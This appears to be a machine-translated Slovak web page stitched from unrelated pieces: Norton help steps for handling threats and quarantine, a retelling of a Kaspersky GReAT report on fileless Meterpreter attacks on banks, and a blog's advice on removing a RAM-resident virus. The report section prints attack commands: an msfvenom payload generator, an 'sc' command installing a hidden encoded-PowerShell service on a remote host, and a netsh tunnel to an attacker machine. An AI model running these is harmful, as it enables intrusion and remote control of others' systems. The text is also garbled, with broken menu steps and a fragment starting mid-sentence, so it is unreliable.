Keď Norton zistí hrozbu, program ju automaticky odstráni, pokiaľ váš zásah nie je potrebný na určenie, ako s hrozbou zaobchádzať. V takýchto prípadoch Norton zobrazí upozornenie „Zistené hrozby“ alebo „Bezpečnostná hrozba“ s dostupnými možnosťami reakcie na hrozbu.
Zobrazenie hrozieb, ktoré boli automaticky odstránené počas kontroly
Spustite Norton.
Zabezpečenie zariadenia, kliknite na Otvoriť.
V okne Bezpečnostný denník Bezpečnostné hrozby vyriešené.
Vyberte hrozbu zo zoznamu a zobrazte vykonané akcie na table Podrobnosti.
V niektorých prípadoch Norton namiesto automatického vyriešenia hrozby odporúča, aby ste na vyriešenie hrozby vykonali konkrétnu akciu.
Oprava hrozieb, ktoré neboli odstránené počas kontroly
Spustite Norton.
Ak sa vedľa zobrazí okno My Norton Zabezpečenie zariadenia, kliknite na Otvoriť.
V hlavnom okne Norton dvakrát kliknite na položku Zabezpečenie a potom vyberte položku Protokol.
V okne Bezpečnostný denník v zozname Zobraziť vyberte Nevyriešené bezpečnostné hrozby.
Ak zoznam obsahuje nevyriešené hrozby, vyberte hrozbu, ktorá vás zaujíma.
Ak máte dôvod domnievať sa, že váš systém je infikovaný, spustite Norton Power Eraser. Norton Power Eraser je výkonný nástroj na odstránenie škodlivého softvéru, ktorý vás zbaví najodolnejších bezpečnostných hrozieb. Ďalšie informácie nájdete v časti Spustenie kontroly hrozieb Norton na počítači
Norton Power Eraser je agresívny nástroj na odstránenie škodlivého softvéru. Norton Power Eraser môže niekedy odstrániť legitímne súbory spolu s malvérom, preto si pred odstránením akýchkoľvek súborov pozorne skontrolujte výsledky kontroly.
Norton štandardne odstraňuje bezpečnostné hrozby z vášho počítača a dáva ich do karantény. Ak máte dôvod domnievať sa, že súbor bol vymazaný omylom, môžete ho obnoviť z karantény do pôvodného umiestnenia a vylúčiť ho z následných kontrol.
Obnovenie súboru z karantény
Spustite Norton.
Ak sa vedľa zobrazí okno My Norton Zabezpečenie zariadenia, kliknite na Otvoriť.
V hlavnom okne Norton kliknite na položku Zabezpečenie a potom vyberte položku Log.
V okne Bezpečnostný denník Rozbaľte ponuku Zobraziť a vyberte možnosť Karanténa.
Vyberte súbor, ktorý chcete obnoviť.
Na table s podrobnosťami kliknite na položku Možnosti.
V okne Detekovaná hrozba vybrať tím Obnovte a vylúčte tento súbor.
V okne Zotavenie z karantény Kliknite na tlačidlo Áno.
V okne Prehľadávať priečinok vyberte priečinok alebo jednotku, do ktorej chcete umiestniť obnovený súbor, a kliknite na tlačidlo OK.
o novej, zaujímavej škodlivej kampani, ktorá zasiahla banky, telekomunikácie, vládne agentúry, ako aj ďalšie spoločnosti a organizácie vo viac ako štyridsiatich krajinách sveta.
Analytici tímu GReAT píšu, že bankový bezpečnostný tím si ako prvý všimol hrozbu: potom sa vo fyzickej pamäti radiča domény našiel kód Meterpreter. Produkty Kaspersky Lab rozpoznávajú problémy ako MEM:Trojan.Win32.Cometer a MEM:Trojan.Win32.Metasploit. Keď sa analytici hrabali hlbšie a snažili sa pochopiť, odkiaľ sa kód v pamäti vzal, objavili aj skripty PowerShell v registri Windows a pomôcku NETSH, ktorá sa používala na tunelovanie prevádzky na riadiaci server útočníkov.
Takéto útoky sa nazývajú „bezsúborové“, to znamená, že malvér neumiestňuje žiadne súbory na pevný disk; namiesto toho sa užitočné zaťaženie vloží priamo do pamäte a existuje vo vnútri pamäte RAM. Samozrejme, takýto útok je mimoriadne ťažké odhaliť a sledovať.
Vzor útoku
Výskumníci vysvetľujú, že známy rámec Metasploit možno použiť na vytváranie skriptov, ako je príklad nižšie.
Takéto skripty pomáhajú vložiť Meterpreter do pamäte RAM. Msfvenom z Metasploit je možné použiť na ich generovanie:
Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
Po vygenerovaní skriptu útočníci použijú Windows SC na inštaláciu záškodníckej služby na cieľovom hostiteľovi (čo nakoniec spustí vyššie uvedený skript). Môžete to urobiť napríklad pomocou nasledujúceho príkazu:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c štart /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA...” štart= manual
Ďalším krokom je nakonfigurovať tunelovanie tak, aby sa infikovaný počítač stal prístupným pre vzdialený hostiteľ. Na tento účel sa útočníci uchýlia k nasledujúcemu príkazu:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
V dôsledku toho bude všetka sieťová prevádzka z 10.10.1.11:4444 presmerovaná na 10.10.1.12:8080. Táto technika vám umožňuje nainštalovať proxy tunel, pomocou ktorého môžu zločinci na diaľku ovládať hostiteľa infikovaného PowerShell.
Analytici poznamenávajú, že používanie SC a NETSH vyžaduje oprávnenia správcu na lokálnom a vzdialenom hostiteľovi. Používanie škodlivých skriptov PowerShell bude tiež vyžadovať eskaláciu privilégií a zmeny v politike vykonávania. Na tento účel sa útočníci uchýlia k použitiu vyklápača poverení Mimikatz, ktorý zbiera heslá z účtov na lokálnom počítači a okolitých pracovných staniciach.
Po dôkladnom preštudovaní útoku na jednu z postihnutých bánk vedci dospeli k záveru, že prevádzkovatelia tejto kampane používali domény tretej úrovne, ako aj domény v zónach .GA, .ML, .CF. Faktom je, že takéto domény sú bezplatné, čo znamená, že útočníci nezanechávajú informácie WHOIS.
Zhrnutím všetkého vyššie uvedeného (používanie Metasploit a štandardných Windows utilít, domény bez informácií WHOIS) výskumníci dospeli k záveru, že rukopis neznámych útočníkov je veľmi podobný práci skupín ako GCMAN a Carbanak. Neexistujú však žiadne priame dôkazy, takže nie je možné spájať tieto tiché útoky so žiadnou konkrétnou skupinou.
„Techniky, ako sú tie, ktoré sú opísané v tejto správe, sú čoraz bežnejšie, najmä [keď sa vykonávajú útoky] proti veľkým cieľom v bankovom sektore. Bohužiaľ, používanie jednoduchých nástrojov v kombinácii s rôznymi trikmi veľmi sťažuje detekciu [takýchto útokov],“ sumarizujú odborníci z GReAT.
Vírus v pamäti RAM je pomerne nepríjemný jav a, žiaľ, nie je nezvyčajný. veľmi často vidíme skrytý súbor, ale nemôžeme ho žiadnym spôsobom odstrániť - stále sa objavuje a objavuje, alebo nám to samotný operačný systém Windows neumožňuje.
Mimochodom, oveľa častejšie sa prejavuje v prípadoch nesprávneho nastavenia antivírusu alebo jeho absencie. Ak máte takúto situáciu, odporúčam vám prečítať si článok - inštalácia a konfigurácia antivírusu v systéme Windows. Pred odstránením vírusu z pamäte RAM sa oplatí pochopiť, čo sa deje s antivírusovým programom nainštalovaným v počítači. Váš antivírusový program bol s najväčšou pravdepodobnosťou „zničený“ novým vírusom. Je tiež možné, že v arzenáli podpisov vášho antivírusového programu neexistuje žiadna metóda na úplné vymazanie vírusu z včasnej zbierky a program sa iba pokúša odstrániť vírus infekcia, a nie samotný vírus.
Často sa vyskytujú situácie, keď vírus prenesie programy a ďalšie súbory pre svoju prácu alebo automaticky začne pracovať, ale antivírusový program teraz tieto kópie deteguje, ale nezistí samotný zdrojový kód (vírus) a vo väčšine prípadov nedokáže vyrovnať sa s tým.
- Odstránime (pomocou odinštalátora - pridať/odstrániť programy) nainštalovaný antivírusový program, tu je to zbytočné.
- Stiahnite si CCleaner z internetu a nainštalujte ho. Začnime, najprv vymažte dočasné priečinky. Tento softvér je vhodný pre bežných používateľov, takže je možné zaškrtnúť všetky políčka v nastaveniach – nevymaže používateľské údaje! Viac o programe som písal v článku - čistenie registrov.
- Potom budeme potrebovať nástroj na čistenie vírusov, ktorý nám pomôže. Napísal som o nich v článku - bezplatné nástroje na odstránenie vírusov. Vyberáme si ľubovoľnú. Stiahnite si napríklad program Dr.web Cure it z internetu a nainštalujte ho.
- Nainštalujte aktualizáciu a spustite jedno z dvoch skenov (rýchle alebo úplné). Rýchle skenovanie poskytuje v zásade efektívny výsledok. Odstraňujeme všetky zistené vírusy. Reštartujte počítač.
- Stiahnite si nový antivírus. Zásadne dôležité! Ak ste pred problémami mali nainštalovaný antivírus Eset NOD32 antivírus, potom si nainštalujte Avast alebo Avira, ak bol nainštalovaný Avast, nainštalujte si Eset alebo akýkoľvek iný antivírus podľa vášho výberu.
- Je pomerne ľahké interpretovať takéto akcie, antivírusový program, ktorý ste mali, bol s najväčšou pravdepodobnosťou poškodený, údaje v registri mohli zostať, čo povedie k nepresnej činnosti antivírusového programu, najmä preto, že tento konkrétny antivírusový program nenašiel hrozba z internetu na vašom počítači.